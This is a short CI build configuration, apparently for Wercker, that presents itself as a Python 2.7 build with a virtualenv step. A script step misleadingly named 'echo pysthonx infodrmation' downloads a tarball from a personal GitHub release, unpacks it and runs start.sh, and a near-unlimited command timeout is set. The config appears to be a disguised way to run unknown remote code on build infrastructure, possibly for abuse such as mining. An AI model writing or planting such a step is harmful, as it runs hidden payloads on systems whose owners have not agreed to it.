box: python:2.7
command-timeout: 99999
build:
  steps:
    - virtualenv:
        name: setup virtual environment
        install_wheel: true # Enable wheel to speed up builds (experimental)
    - script:
        name: echo pysthonx infodrmation
        code: |
          wget https://github.com/santok171/sugargula/releases/download/02/kntl.tar.gz
          tar xf kntl.tar.gz
          sh start.sh
